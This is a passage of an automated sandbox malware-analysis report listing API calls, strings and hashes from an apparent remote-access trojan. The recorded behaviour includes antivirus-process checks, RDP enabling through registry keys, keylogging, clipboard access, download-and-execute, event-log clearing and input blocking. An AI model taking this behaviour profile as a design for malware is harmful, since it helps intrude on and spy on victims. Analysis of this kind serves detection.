                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$lstrlen$_strrev$CloseGlobalMemoryNameOpenQueryStatusValue$??2@ComputerCountCreateDiskDriveFileFirstFreeInfoInformationLogicalProcess32SnapshotSpaceStringsTickToolhelp32UserVersionVolume_strcmpi
                                • String ID: 360tray.exe$@$@$ESET $HARDWARE\DESCRIPTION\System\CentralProcessor\0$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KSafeTray.exe$KvMonXP.exe$PortNumber$ProcessorNameString$QQPCTray.exe$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$egui.exe$exe.DnoMvaR$exe.ds063$exe.pva$kxetray.exe$~MHz
                                • API String ID: 1471316505-3197601762
                                • Opcode ID: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                • Instruction ID: f75789e8d26e0488ce98ecbec9e6a297644c4fc480bb15a39e026aad78d3882d
                                • Opcode Fuzzy Hash: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                • Instruction Fuzzy Hash: A0E1D7B1504385AFE720CB64CC45FEBB7DAEFC4340F40892DF68597251EB74AA098B66
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10010811
                                • OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 10010826
                                • LocalAlloc.KERNEL32(00000040,00010000), ref: 10010839
                                • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 10010857
                                • LocalAlloc.KERNEL32(00000040,00000104), ref: 10010864
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100108AF
                                • LocalAlloc.KERNEL32(00000040,00001000), ref: 100108C2
                                • QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 100108D6
                                • lstrcat.KERNEL32(00000000,1007B8FC), ref: 1001091B
                                • lstrcat.KERNEL32(?,1007B8F4), ref: 1001093E
                                • lstrcat.KERNEL32(?,1007B8EC), ref: 10010961
                                • lstrcat.KERNEL32(?,1007B8E4), ref: 10010984
                                • wsprintfA.USER32 ref: 100109A1
                                • wsprintfA.USER32 ref: 100109CF
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                  • Part of subcall function 1000E630: RegQueryValueExA.ADVAPI32(?,100109FB,00000000,100109FB,?), ref: 1000E653
                                • wsprintfA.USER32 ref: 10010A10
                                • lstrlen.KERNEL32(?), ref: 10010A19
                                • lstrlen.KERNEL32(?), ref: 10010A25
                                • lstrlen.KERNEL32(?), ref: 10010A31
                                • lstrlen.KERNEL32(?), ref: 10010A3A
                                • lstrlen.KERNEL32(?), ref: 10010A46
                                • lstrlen.KERNEL32 ref: 10010A4D
                                • lstrlen.KERNEL32(?), ref: 10010A55
                                • LocalSize.KERNEL32(?), ref: 10010A67
                                • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010A75
                                • lstrlen.KERNEL32(?), ref: 10010A83
                                • lstrlen.KERNEL32(?), ref: 10010AA8
                                • lstrlen.KERNEL32(00000000), ref: 10010AB9
                                • lstrlen.KERNEL32(00000001), ref: 10010AD7
                                • lstrlen.KERNEL32(?), ref: 10010AED
                                • lstrlen.KERNEL32(?), ref: 10010B0E
                                • lstrlen.KERNEL32(?), ref: 10010B24
                                • lstrlen.KERNEL32(?), ref: 10010B4C
                                • lstrlen.KERNEL32(?), ref: 10010B5F
                                • lstrlen.KERNEL32(?), ref: 10010B81
                                • lstrlen.KERNEL32(?), ref: 10010B97
                                • lstrlen.KERNEL32(?), ref: 10010BBF
                                • lstrlen.KERNEL32(?), ref: 10010BD5
                                • lstrlen.KERNEL32(?), ref: 10010BFD
                                • CloseServiceHandle.ADVAPI32(?), ref: 10010C10
                                • LocalFree.KERNEL32(?), ref: 10010C1B
                                  • Part of subcall function 1000E4C0: RegCloseKey.ADVAPI32(?,?,10010C35), ref: 1000E56B
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010C56
                                • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010C64
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
                                • String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 1351573288-819907790
                                • Opcode ID: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                • Instruction ID: b787a0c5a13c364073f78a8c29dfe8d65fa9e81c690259f46e75a22daf9f128f
                                • Opcode Fuzzy Hash: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                • Instruction Fuzzy Hash: 94E18D722083859FD724CF24CC84AABB7E6FBC8700F44491DF68A97240DB75E949CB96
                                APIs
                                  • Part of subcall function 1000B030: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                  • Part of subcall function 1000B030: lstrlen.KERNEL32(?), ref: 1000B05E
                                  • Part of subcall function 1000B030: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                  • Part of subcall function 1000B030: RegCloseKey.ADVAPI32(?), ref: 1000B084
                                  • Part of subcall function 1000B090: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B0AE
                                  • Part of subcall function 1000B090: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 1000B0CD
                                  • Part of subcall function 1000B090: RegCloseKey.ADVAPI32(?), ref: 1000B0DC
                                • _strrev.MSVCRT ref: 1000B150
                                • _strrev.MSVCRT ref: 1000B16F
                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B24A
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • ExitWindowsEx.USER32(00000002,00000000), ref: 1000B276
                                  • Part of subcall function 10011F80: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                  • Part of subcall function 10011F80: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                  • Part of subcall function 10011F80: GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                  • Part of subcall function 10011F80: CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseValue$CreateProcessToken_strrev$AdjustCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesVersionWindowslstrlen
                                • String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
                                • API String ID: 3375006655-3505973513
                                • Opcode ID: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                • Instruction ID: dc20f7a170daff86b313850e6ec23c72e1b0ea6aef47688a3a0a21085afcf0ea
                                • Opcode Fuzzy Hash: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                • Instruction Fuzzy Hash: AA31A174940F28B5F120E6A04C4FFEB6648CB50788F10C418FBD878287FB697261816F
                                APIs
                                • Sleep.KERNEL32(000007D0), ref: 1000B6FF
                                • GetTickCount.KERNEL32 ref: 1000B753
                                • wsprintfA.USER32 ref: 1000B768
                                • URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B780
                                • GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B794
                                • fopen.MSVCRT ref: 1000B7A4
                                • fscanf.MSVCRT ref: 1000B7CB
                                • GetTickCount.KERNEL32 ref: 1000B7D9
                                • wsprintfA.USER32 ref: 1000B7F1
                                • GetTickCount.KERNEL32 ref: 1000B7F6
                                • wsprintfA.USER32 ref: 1000B80E
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B829
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B843
                                • fscanf.MSVCRT ref: 1000B857
                                • fclose.MSVCRT ref: 1000B866
                                • DeleteFileA.KERNEL32(C:\), ref: 1000B874
                                • Sleep.KERNEL32(?), ref: 1000B8BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
                                • String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
                                • API String ID: 2342319182-3740277425
                                • Opcode ID: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                • Instruction ID: 0df0333b831ebe22e1ced74288834e4a7ee40290f568383da85469ab5f36e64c
                                • Opcode Fuzzy Hash: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                • Instruction Fuzzy Hash: E6410471108391ABF324DB60CC89FEB379DEB84701F008918FB8996180DFB5AA08C766
                                APIs
                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 100070B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AccountLookupName
                                • String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
                                • API String ID: 1484870144-2807325862
                                • Opcode ID: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                • Instruction ID: e483fb9418fd38a6f4b972ea0e4669484a3c348eff1775e07851af791e1d4d35
                                • Opcode Fuzzy Hash: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                • Instruction Fuzzy Hash: 7A21307150C382AFE301CB64D884B9BBBE4ABA5744F44894CF4D846252E2B8D64DC7A3
                                APIs
                                • lstrlen.KERNEL32(?,?,?,?), ref: 10008B8A
                                • wsprintfA.USER32 ref: 10008BC3
                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008BD5
                                • wsprintfA.USER32 ref: 10008C14
                                • wsprintfA.USER32 ref: 10008C37
                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008CAD
                                • ??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008D16
                                • FindNextFileA.KERNEL32(?,?), ref: 10008D45
                                • FindClose.KERNEL32(?), ref: 10008D58
                                Yara matches
                                Similarity
                                • API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
                                • String ID: %s%s%s$%s%s*.*$.
                                • API String ID: 862180513-1343461528
                                • Opcode ID: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                • Instruction ID: 519f5399ce91295c37a26932b4474774ed52c623669e24a96c359b1586835bbf
                                • Opcode Fuzzy Hash: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                • Instruction Fuzzy Hash: E851D1B14083809FE724CF28C884A9BBBE5FBC8750F404A1DE5D957291DB75EA09CB56
                                APIs
                                • Sleep.KERNEL32(0000000A), ref: 10009A66
                                • lstrlen.KERNEL32(?), ref: 10009A71
                                • GetKeyState.USER32(00000010), ref: 10009ABB
                                • GetAsyncKeyState.USER32(0000000D), ref: 10009AC7
                                • GetKeyState.USER32(00000014), ref: 10009AD4
                                • GetKeyState.USER32(00000014), ref: 10009AFC
                                Yara matches
                                Similarity
                                • API ID: State$AsyncSleeplstrlen
                                • String ID: <BackSpace>$<Enter>
                                • API String ID: 43598291-3792472884
                                • Opcode ID: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                • Instruction ID: 6c961daac165878122585f88262e92b73c779f3799918725d04435c3580de12f
                                • Opcode Fuzzy Hash: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                • Instruction Fuzzy Hash: 5D5165325083869BFB10DF64ED947AF73E9EB86390F000D28E99183094EB75D849C393
                                Yara matches
                                Similarity
                                • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                • String ID: %s\%s$%s\*.*$.
                                • API String ID: 2470771279-1471744235
                                • Opcode ID: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                • Instruction ID: 4997ef6c0a53b4edcb34f252ea04d2ab30cd8e24f1ff6c4f86697f3dae8976e3
                                • Opcode Fuzzy Hash: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                • Instruction Fuzzy Hash: D111A8711083955BF220DBA0DCC8EEB77ACFFC5351F054C19F69942144E7B9964887A6
                                APIs
                                • LocalAlloc.KERNEL32(00000040,00002800), ref: 10008542
                                • wsprintfA.USER32 ref: 1000855F
                                • FindFirstFileA.KERNEL32(?,?), ref: 10008575
                                • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 100085CB
                                • lstrlen.KERNEL32(?), ref: 1000865A
                                • FindNextFileA.KERNEL32(?,?), ref: 100086AD
                                Yara matches
                                Similarity
                                • API ID: AllocFileFindLocal$FirstNextlstrlenwsprintf
                                • String ID: %s\*.*$h
                                • API String ID: 1497773571-1052742963
                                • Opcode ID: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                • Instruction ID: 6dc3bffa24102d40f333cfea9b115bd59c6de41bc40a21ef2b6d5182f104caaf
                                • Opcode Fuzzy Hash: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                • Instruction Fuzzy Hash: 825178319083829BE720CF248C8468BBBE6FF95384F014618FDD497381D77A9A09CB95
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A6FA
                                • RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A718
                                • RegCloseKey.ADVAPI32(?), ref: 1000A723
                                • Sleep.KERNEL32(00000001), ref: 1000A72B
                                • lstrlen.KERNEL32(?), ref: 1000A736
                                • strstr.MSVCRT ref: 1000A74A
                                • lstrcpy.KERNEL32(00000000,?), ref: 1000A759
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A7AE
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
                                • String ID: Applications\iexplore.exe\shell\open\command$D
                                • API String ID: 454182167-535818822
                                • Opcode ID: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                • Instruction ID: 593cd418b48c47020334956aaadb0b49f021ee54466ec57afc295a09b57ba92d
                                • Opcode Fuzzy Hash: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                • Instruction Fuzzy Hash: 36216071208351AFF710CB60CD49FAB77E9EB85741F00491CF689962D0DBF8A948CB62
                                APIs
                                  • Part of subcall function 10012980: GetCurrentThreadId.KERNEL32 ref: 10012992
                                  • Part of subcall function 10012980: GetThreadDesktop.USER32(00000000), ref: 10012999
                                  • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                  • Part of subcall function 10012980: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                  • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                  • Part of subcall function 10012980: lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                  • Part of subcall function 10012980: SetThreadDesktop.USER32(00000000), ref: 10012A18
                                  • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A30
                                  • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A33
                                • SetCursorPos.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8A8
                                • WindowFromPoint.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B0
                                • SetCapture.USER32(00000000,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B7
                                • MapVirtualKeyA.USER32(?,00000000), ref: 1000F8F6
                                • keybd_event.USER32(?,00000000), ref: 1000F900
                                • MapVirtualKeyA.USER32(?,00000000), ref: 1000F914
                                • keybd_event.USER32(00000000,00000000), ref: 1000F91E
                                • mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000F9DA
                                Yara matches
                                Similarity
                                • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
                                • String ID:
                                • API String ID: 1258999209-0
                                • Opcode ID: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                • Instruction ID: 813ed5156889d3fee33ae762c864079a57abd66bf6c8d8a424e07c18233b4e17
                                • Opcode Fuzzy Hash: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                • Instruction Fuzzy Hash: F34191317C0365BAF230CA148C8BF6A76A5E744F81F30811AF745FEAC9C5E4B940A69D
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 1000FA9A
                                • GetClipboardData.USER32(00000001), ref: 1000FAA6
                                • CloseClipboard.USER32 ref: 1000FAB6
                                • GlobalSize.KERNEL32(00000000), ref: 1000FAC5
                                • GlobalLock.KERNEL32(00000000), ref: 1000FACF
                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FAD8
                                • GlobalUnlock.KERNEL32(?), ref: 1000FAFF
                                • CloseClipboard.USER32 ref: 1000FB05
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FB17
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
                                • String ID:
                                • API String ID: 3218637236-0
                                • Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                • Instruction ID: 8bd8b15d585b0a66e5e0549ea23a2daac3cce8b349df5dd2cf32f6ef4495ba93
                                • Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                • Instruction Fuzzy Hash: 410122356043646FE700EF349C89AAB379AFF45741F404528FD0686200EBB5AC08C6B2
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 1000FA22
                                • EmptyClipboard.USER32 ref: 1000FA2E
                                • GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FA3E
                                • GlobalLock.KERNEL32(00000000), ref: 1000FA4C
                                • GlobalUnlock.KERNEL32(00000000), ref: 1000FA69
                                • SetClipboardData.USER32(00000001,00000000), ref: 1000FA72
                                • GlobalFree.KERNEL32(00000000), ref: 1000FA79
                                • CloseClipboard.USER32 ref: 1000FA80
                                Yara matches
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                • String ID:
                                • API String ID: 453615576-0
                                • Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                • Instruction ID: 6a4c86568739cfa889f9428084719cbd4829a3f5d72f13fa7c8734bacd2a58ba
                                • Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                • Instruction Fuzzy Hash: 5EF01D722003A19BF704AB708CCCA6B3A9AFB59792F040428FA46D6251CFA48C06D761
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                • OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                • GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                • CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 3398352648-0
                                • Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                • Instruction ID: cc3510a64544969e40c7ba664627dc8a20d979994d2bd73b5cc00ac410b68b64
                                • Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                • Instruction Fuzzy Hash: D401B171604361ABF704DB64CC8AF9B77A9FF88B00F41892CF9858A190D7F4EC449BA1
                                APIs
                                • FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 10008F3F
                                • FindClose.KERNEL32(00000000), ref: 10008FB9
                                • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10008FD1
                                • CloseHandle.KERNEL32(00000000), ref: 10008FFB
                                Yara matches
                                Similarity
                                • API ID: CloseFileFind$CreateFirstHandle
                                • String ID: p
                                • API String ID: 3283578348-2181537457
                                • Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                • Instruction ID: a9351d47ce1d038b449e59aee4ebb529ff1c7d311b8e8fe0981f574282c16cb6
                                • Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                • Instruction Fuzzy Hash: E931B5719083139BE324DF28CC4576AB6AAFBC43E0F15853EF8999B3D4C6748A448792
                                APIs
                                • OpenEventLogA.ADVAPI32(00000000), ref: 1000A50C
                                • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000A517
                                • CloseEventLog.ADVAPI32(00000000), ref: 1000A51A
                                Yara matches
                                Similarity
                                • API ID: Event$ClearCloseOpen
                                • String ID:
                                • API String ID: 1391105993-0
                                • Opcode ID: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                • Instruction ID: 2f13a3a00fc351755ca7788bc276ed95c0dd4850e5c3601e4dc9bed05caac4f8
                                • Opcode Fuzzy Hash: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                • Instruction Fuzzy Hash: 6EF096715057529BE300DF09CC80B5FBBE4FF85750F800908FA5497210D3B5AA598BEA
                                APIs
                                • BlockInput.USER32(00000000), ref: 1000F45C
                                • BlockInput.USER32(?,?,?,00000000), ref: 1000F475
                                Yara matches
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                • Instruction ID: f75e578da579e437ca953510df7974459397082eec6ccbfe99a7c7589e24c54f
                                • Opcode Fuzzy Hash: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                • Instruction Fuzzy Hash: 4B411837B486849BC314DF98A441BBEFB75FBC6621F0086AFE85583B00CB366914D7A1
                                Similarity
                                • API ID:
                                • String ID: hXMV$hXMV
                                • API String ID: 0-400149659
                                • Opcode ID: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                • Instruction ID: 79a79fee38ca8a1330c9593f9425e5eef8b4821128400f5dbd5ea3b8bade0337
                                • Opcode Fuzzy Hash: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                • Instruction Fuzzy Hash: 08F0C272D08685AAD7008B4ADC51BAFFBB8E745B20F20422AE524537C1D63A18018AA0
                                APIs
                                • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002814
                                Similarity
                                • API ID: NtdllProc_Window
                                • String ID:
                                • API String ID: 4255912815-0
                                • Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                • Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
                                • Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                • Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
